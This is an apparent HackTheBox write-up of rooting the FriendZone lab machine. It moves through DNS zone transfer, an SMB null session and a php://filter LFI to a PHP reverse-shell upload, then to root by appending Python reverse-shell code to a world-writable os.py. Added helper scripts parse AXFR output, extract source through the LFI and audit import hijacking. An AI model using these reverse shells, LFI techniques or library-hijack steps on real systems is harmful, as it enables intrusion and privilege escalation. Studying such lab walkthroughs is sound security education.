FriendZone HackTheBox WalkThrough
This is the FriendZone HackTheBox machine walkthrough, the 25th machine of our OSCP-like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the FriendZone HackTheBox machine. Before diving into the hacking part, some facts about the box: it is a Linux machine with IP address 10.10.10.123 and a difficulty rating of easy assigned by its maker.
Since this machine is retired, you will need a VIP subscription at hackthebox.eu to access it. First connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity by pinging 10.10.10.123. If the box answers, start hacking.
As usual I started by scanning the machine with Nmap.
Scanning tells us how to proceed: it finds the open and closed ports and identifies the services and versions running on them. I used Nmap for this and the result is given below:-
$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123
Nmap found ports 21, 22, 53, 80, 139, 443 and 445 open. The services are VsFTPd on port 21, OpenSSH on port 22, DNS on port 53, Apache2 on port 80, SMB on ports 139 and 445, and SSL (Apache2 over HTTPS) on port 443. We have a lot of services to enumerate. We will start by searching for exploits for each software version shown by Nmap.
Searchsploit (an offline tool to query exploit-db.com) did not find any relevant exploit for the detected versions; presumably all the software was up to date when the machine was released. We will have to find some other attack vector to get into the machine.
Port 21 is open, so anonymous login is the first thing to check whenever FTP shows up in a scan. I tried logging in as anonymous, but anonymous login is not allowed. On port 22 we will test SSH login once we obtain some credentials; for now, since none are available, I moved on to enumeration on port 80.
The URL http://10.10.10.123/ revealed an email address, [email protected]; the domain extracted from it is friendzoneportal.red. The Nmap ssl-cert script also revealed a domain, friendzone.red. I additionally added friendzone.htb, the conventional name for an HTB box, in case virtual-host routing serves a different site for it. So right now we have three domains; let us add them to our hosts file, /etc/hosts, and then check what each one serves over HTTPS.
$ cat /etc/hosts
https://friendzone.htb/ — Not found
https://friendzoneportal.red/ — Watching you image
https://friendzone.red/ — Ready to escape from FriendZone
We have a DNS service running on port 53 and two zones of interest (friendzoneportal.red and friendzone.red), so let us check whether a DNS zone transfer (AXFR) to our local machine is allowed. A properly configured nameserver refuses AXFR from arbitrary clients, but when I tried it, this server handed over the zone files for both domains.
Performing DNS Zone Transfer
$ dig @10.10.10.123 friendzoneportal.red axfr
$ dig @10.10.10.123 friendzone.red axfr
The zone transfers revealed several more names: admin.friendzoneportal.red, files.friendzoneportal.red, imports.friendzoneportal.red and vpn.friendzoneportal.red under the first zone, and administrator1.friendzone.red, hr.friendzone.red and uploads.friendzone.red under the second. That is 14 new URLs to check, 7 over http and 7 over https. Before accessing them, let us add the new names to /etc/hosts as well.
$ cat /etc/hosts
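Turning a zone transfer into hosts entries by hand gets tedious once a zone has more than a handful of names. The script below is an added example written for this walkthrough, not part of the original page: it parses the text that `dig @ns zone axfr` prints into the unique hostnames that carry A/AAAA/CNAME records and emits /etc/hosts lines that point them at the box IP (the zone itself lists 127.0.0.1, which is useless from the attacker's side). The AXFR text embedded in it is a constructed sample modelled on this box's zone, not the real transfer, and `run_axfr` is a thin wrapper around dig for live use.

```python
import re
import subprocess
from typing import List

# Constructed sample of `dig @10.10.10.123 friendzone.red axfr` output
# (record types and layout as dig prints them; not the real transfer).
SAMPLE_AXFR = """\
; <<>> DiG 9.16.1 <<>> @10.10.10.123 friendzone.red axfr
;; global options: +cmd
friendzone.red.                604800 IN SOA  localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                604800 IN AAAA ::1
friendzone.red.                604800 IN NS   localhost.
friendzone.red.                604800 IN A    127.0.0.1
administrator1.friendzone.red. 604800 IN A    127.0.0.1
hr.friendzone.red.             604800 IN A    127.0.0.1
uploads.friendzone.red.        604800 IN A    127.0.0.1
friendzone.red.                604800 IN SOA  localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
"""

# owner  TTL  IN  type  rdata -- SOA/NS/TXT rows never match because their
# rdata is more than one token and their type is not in the alternation.
RECORD = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>A|AAAA|CNAME)\s+(?P<rdata>\S+)$")


def names_from_axfr(axfr_text: str) -> List[str]:
    """Unique hostnames (trailing dot stripped) that have A/AAAA/CNAME records,
    in first-seen order.  dig's ';' comment lines are skipped."""
    seen = {}
    for line in axfr_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD.match(line)
        if m:
            seen.setdefault(m.group("name").rstrip("."), None)
    return list(seen)


def hosts_lines(ip: str, names: List[str]) -> str:
    """One /etc/hosts line per name, every name resolving to the box IP."""
    return "\n".join(f"{ip}\t{name}" for name in names)


def run_axfr(ns: str, zone: str) -> str:
    """Live zone transfer through dig (needs network; not exercised offline)."""
    proc = subprocess.run(["dig", f"@{ns}", zone, "axfr"],
                          capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    # Offline demo on the constructed sample.  Against the box, replace
    # SAMPLE_AXFR with run_axfr("10.10.10.123", "friendzone.red") and
    # append the output to /etc/hosts.
    print(hosts_lines("10.10.10.123", names_from_axfr(SAMPLE_AXFR)))
```

Run it once per zone and pipe the output through `sudo tee -a /etc/hosts`; names that already exist in the file are harmless duplicates, but worth trimming.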
Enumeration on Port 80 & 443
All the http URLs serve the same page and many of the https URLs are dead. I have annotated each URL below.
http://admin.friendzoneportal.red — Same as initial home page
https://admin.friendzoneportal.red — login-page
http://files.friendzoneportal.red — Same as initial home page
https://files.friendzoneportal.red — Not Found
http://imports.friendzoneportal.red — Same as initial home page
https://imports.friendzoneportal.red — Not Found
http://vpn.friendzoneportal.red — Same as initial home page
https://vpn.friendzoneportal.red — Not Found
http://administrator1.friendzone.red — Same as initial home page
https://administrator1.friendzone.red — Admin Login Page
http://hr.friendzone.red — Same as initial home page
https://hr.friendzone.red — Not Found
http://uploads.friendzone.red — Same as initial home page
https://uploads.friendzone.red — File Upload Options
The http URLs are useless for now because they all serve the same page; we will come back to them if the https URLs yield nothing. For now we focus on https://admin.friendzoneportal.red and https://administrator1.friendzone.red, because they have login pages where we can test a lot of vulnerabilities, and on https://uploads.friendzone.red to test for a file upload vulnerability. Starting with https://admin.friendzoneportal.red.
Logging in with any credentials gave the message “Admin page is not developed yet!!! check for another one”. This hints that another admin login page exists.
https://administrator1.friendzone.red has that other admin login page. I tried some basic injection (SQL and others) but nothing worked; it needs valid credentials. We will return to this page once we have some.
Next, https://uploads.friendzone.red. It allows file uploads with no restriction, so we could even upload a webshell through it, but the problem is that we cannot reach our uploaded files: that would need a directory listing or an LFI-type vulnerability that lets us include them, and so far neither is present.
Enumeration on Port 445
Port 445 is open, so let us check whether a null session is allowed.
$ smbmap -H 10.10.10.123 -R --depth 5
A null session is allowed and we have read access to the general share, which contains a file creds.txt. Let us download it with smbclient.
$ smbclient //10.10.10.123/general
smb: > get creds.txt
smb: > exit
$ cat creds.txt
creds.txt contains the credentials of user admin.
Logging in with these credentials at https://administrator1.friendzone.red/login.php tells us to visit /dashboard.php.
https://administrator1.friendzone.red/dashboard.php lists the parameters it expects: image_id=a.jpg&pagename=timestamp. I next tried to reach my uploaded file through the timestamp returned after a successful upload, but that only gave an error.
After spending some more time enumerating this URL I found an LFI vulnerability, confirmed with https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login. The php://filter wrapper returns the included file base64-encoded instead of executing it, so the response gives us the source code of the login page. Decoding it shows login.php comparing the POSTed username and password against hard-coded values and, on success, setting a FriendZoneAuth cookie before telling the user to visit /dashboard.php:
$ echo -n "PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K" | base64 -d
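Reading more files the same way (dashboard.php itself, anything else under the web root) is easier scripted. The following is an added example written for this walkthrough, not the box's code or the author's: it builds the php://filter URL for a page name, fetches it over HTTPS ignoring the self-signed certificate, pulls the base64 blob out of the HTML that dashboard.php wraps around the included file, decodes it and looks for hard-coded credential comparisons of the kind login.php turned out to contain. It assumes that dashboard.php appends .php to pagename itself (which is why resource=login needs no extension) and that it honours the FriendZoneAuth cookie login.php sets. SAMPLE_RESPONSE is a constructed wrapper around the base64 string decoded above, so the decoding path runs offline.

```python
import base64
import re
import ssl
import urllib.parse
import urllib.request
from typing import Optional, Tuple

FILTER = "php://filter/convert.base64-encode/resource="


def filter_url(base: str, page: str, image_id: str = "a.jpg") -> str:
    """URL that makes dashboard.php include <page>.php through the base64
    filter, so the PHP source comes back instead of being executed.
    `page` is given without .php because dashboard.php appends it."""
    query = urllib.parse.urlencode({"image_id": image_id, "pagename": FILTER + page})
    return f"{base.rstrip('/')}/dashboard.php?{query}"


def pagename_param(url: str) -> str:
    """Read back the (URL-decoded) pagename value; sanity check for filter_url."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    return query["pagename"][0]


def extract_source(body: str) -> str:
    """dashboard.php echoes the included file inside its own HTML; take the
    longest base64-looking run in the response and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 payload found in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)          # restore padding if it was stripped
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def hardcoded_credentials(php_source: str) -> Optional[Tuple[str, str]]:
    """Return (username, password) from an `if ($username==="..." and
    $password==="...")` check, or None when the page has no such check."""
    m = re.search(r'\$username\s*===?\s*"([^"]*)"\s+and\s+\$password\s*===?\s*"([^"]*)"',
                  php_source)
    return (m.group(1), m.group(2)) if m else None


def fetch_source(base: str, page: str, auth_cookie: str) -> str:
    """Live fetch (network): GET the filter URL with the FriendZoneAuth cookie,
    skipping certificate verification because the box uses a self-signed cert."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(filter_url(base, page),
                                 headers={"Cookie": f"FriendZoneAuth={auth_cookie}"})
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return extract_source(resp.read().decode("utf-8", errors="replace"))


# Constructed stand-in for a dashboard.php response: generic HTML around the
# same base64 string the walkthrough decodes with `base64 -d` above.
SAMPLE_RESPONSE = (
    "<html><body><h2>Admin dashboard</h2><img src='a.jpg'><p>"
    "PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K"
    "</p></body></html>"
)

if __name__ == "__main__":
    src = extract_source(SAMPLE_RESPONSE)
    print(src)
    print("hard-coded credentials:", hardcoded_credentials(src))
    # Live use against the box (not run here), cookie value from login.php:
    # print(fetch_source("https://administrator1.friendzone.red", "dashboard",
    #                    "e7749d0f4b4da5d03e6e9196fd1d18f1"))
```

Pulling dashboard.php's own source this way is the natural next step: it shows exactly how pagename is turned into an include path, which removes the guesswork about where an uploaded file has to live.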
After a lot of enumeration I still could not find my uploaded webshell. Back in the output of
$ smbmap -H 10.10.10.123 -R --depth 5, the share comments say the Samba server files are stored under /etc/Files/, and the anonymous user also has write permission on the Development share.
By that comment our file should land at /etc/Files/Development/shell, but after uploading the shell into the Development share through smbclient it is actually reachable at /etc/Development/shell: the share's real path does not match the comment, presumably because the admin changed the default directory. The uploaded shell can be executed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell. Note that the .php extension is omitted: dashboard.php appends .php to the pagename value itself before including it, which is also why resource=login worked without an extension above.
Testing For File Upload
Let us upload a simple PHP script to check whether we can execute it.
$ echo "<?php echo \"This is test php file\" ?>" > test.php
$ cat test.php
$ smbclient //10.10.10.123/Development
smb: \> put test.php
smb: \> exit
The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
Getting User Shell
Now that we have confirmed we can upload and execute PHP, let us upload a reverse shell to get a user shell back on our Kali machine.
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php
$ vi shell.php # change to your tun0 IP
$ cat shell.php | grep -A8 -i 10.10.14.12
$ smbclient //10.10.10.123/Development
smb: \>put shell.php
smb: \> exit
Start a netcat listener first, then access https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell to execute the shell (again without the .php extension).
$ nc -nvlp 1234
$ whoami && id
We have a user shell; let us upgrade it to a fully interactive TTY so that we can run more advanced commands through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
After some enumeration I found the file mysql_data.conf, which contains the SSH credentials of user friend. The file is in /var/www/:
$ cat /var/www/mysql_data.conf
The file holds the password for user friend. Let us log in as friend and capture the user flag.
SSH into User Friend
$ ssh [email protected]
$ whoami && id
Capture User Flag
$ cat user.txt
To escalate privileges to root we first have to find a privilege escalation vector. You can run an enumeration script such as LinPEAS or LinEnum, or enumerate manually. I tried LinPEAS but it did not find the PrivEsc vector, so I had to enumerate manually.
Finding PrivEsc Vector
After some enumeration I found the file reporter.py inside /opt/server_admin/:
$ cat /opt/server_admin/reporter.py
Meanwhile I ran pspy (a process monitoring tool) to watch the processes running on the remote machine. It showed reporter.py being executed by root every 2 minutes. If we had write permission on this file we would get a root shell directly, but a normal user cannot write to it, as the ls -la output below shows.
What is notable in the script is that it imports the os module. If we can write our reverse shell code into os.py, that code runs with root privileges every time reporter.py executes, and we get a reverse shell on our netcat listener.
$ ls -la /opt/server_admin/reporter.py
Let us check the permission of os.py.
$ locate os.py
$ ls -la /usr/lib/python2.7/os.py
os.py is world-writable, so any user can make root execute arbitrary code simply by appending it to os.py. When I did this I got a reverse shell with root privileges very easily. So our PrivEsc vector is
Privilege Escalation using Python Library Hijacking. For more on Python library hijacking check this blog; another HTB box writeup with the same privilege escalation vector is here.
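A quick way to find this class of vector, whether you are hunting it as the attacker or checking your own cron jobs as the defender, is to resolve every import of the privileged script and ask whether you could have written it. The script below is an added example for this walkthrough, not code from the box or the author: it parses the target script with the ast module, resolves each imported module the way the import system does for pure-Python modules (the first directory on the search path holding mod.py or mod/__init__.py wins), and reports two hijack conditions: the module file itself is writable (the os.py case here), or a writable directory is searched before the real module (drop a file named after the module there and it is imported instead). Built-in modules such as sys are skipped. The search path defaults to the auditing interpreter's sys.path; since reporter.py runs under /usr/lib/python2.7 on this box, pass that interpreter's path (from python2 -c 'import sys; print(sys.path)') to audit the right tree. The reporter.py, mylib.py and directory names in the demo are constructed.

```python
import ast
import os
import sys
from typing import List, Optional, Sequence, Tuple


def imported_modules(script_path: str) -> List[str]:
    """Top-level package names the script imports (import x / from x import y)."""
    with open(script_path, encoding="utf-8") as f:
        tree = ast.parse(f.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def find_module(module: str, path: Sequence[str]) -> Tuple[Optional[int], Optional[str]]:
    """Mimic the import system's path scan for pure-Python modules: return
    (index in path, file) of the first directory that provides the module."""
    for i, directory in enumerate(path):
        for candidate in (os.path.join(directory, module + ".py"),
                          os.path.join(directory, module, "__init__.py")):
            if os.path.isfile(candidate):
                return i, candidate
    return None, None


def hijack_points(script_path: str,
                  path: Optional[Sequence[str]] = None) -> List[Tuple[str, str, str]]:
    """(module, location, reason) for every import the current user could hijack.
    The script's own directory is searched first, exactly as when it is run."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    search = [script_dir] + [p for p in (path if path is not None else sys.path) if p]
    findings = []
    for module in imported_modules(script_path):
        if module in sys.builtin_module_names:
            continue                 # compiled into the interpreter; no file to replace
        idx, origin = find_module(module, search)
        if origin is None:
            continue                 # C extension or missing; out of scope here
        if os.access(origin, os.W_OK):
            findings.append((module, origin, "module file is writable"))
        for directory in search[:idx]:
            if os.path.isdir(directory) and os.access(directory, os.W_OK):
                findings.append((module, directory,
                                 "writable directory searched before the real module"))
                break                # the first writable directory is enough
    return findings


def demo(root: str) -> List[Tuple[str, str, str]]:
    """Constructed layout: root/cron/reporter.py imports os and a helper that
    lives in root/lib; audit it with root/lib as the only extra search dir."""
    cron, lib = os.path.join(root, "cron"), os.path.join(root, "lib")
    os.makedirs(cron, exist_ok=True)
    os.makedirs(lib, exist_ok=True)
    script = os.path.join(cron, "reporter.py")
    with open(script, "w") as f:
        f.write("import os\nimport mylib\nprint(mylib.report(os.getcwd()))\n")
    with open(os.path.join(lib, "mylib.py"), "w") as f:
        f.write("def report(x):\n    return 'report for ' + x\n")
    return hijack_points(script, [lib])


def demo_in_tempdir() -> List[Tuple[str, str, str]]:
    """Run demo() in a throwaway directory that is removed afterwards."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        return demo(tmp)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python3 audit.py /opt/server_admin/reporter.py
        results = hijack_points(sys.argv[1])
    else:
        results = demo_in_tempdir()
    for module, where, why in results:
        print(f"{module:12} {why}: {where}")
```

On the box the interesting line is the one for os: its file under /usr/lib/python2.7 is writable, which is the finding the manual ls -la confirms. The same scan run as the defender, against every script a root cron job or systemd timer executes, is a cheap check to add to a hardening pass.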
Getting Root Shell
To get a root shell, start a netcat listener in one window and append the following reverse shell code to the end of os.py, changing the IP to your tun0 address. Save it and wait up to 2 minutes for the cron job to fire.
import pty
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.7", 9001))
# bare dup2() works here because os.py has already done `from posix import *`
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
s.close()
$ nano /usr/lib/python2.7/os.py
$ tail -13 /usr/lib/python2.7/os.py
$ nc -nvlp 9001
# whoami && id
We have got root shell. Let us capture root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted the FriendZone HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. For any query or suggestion about the writeup, write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.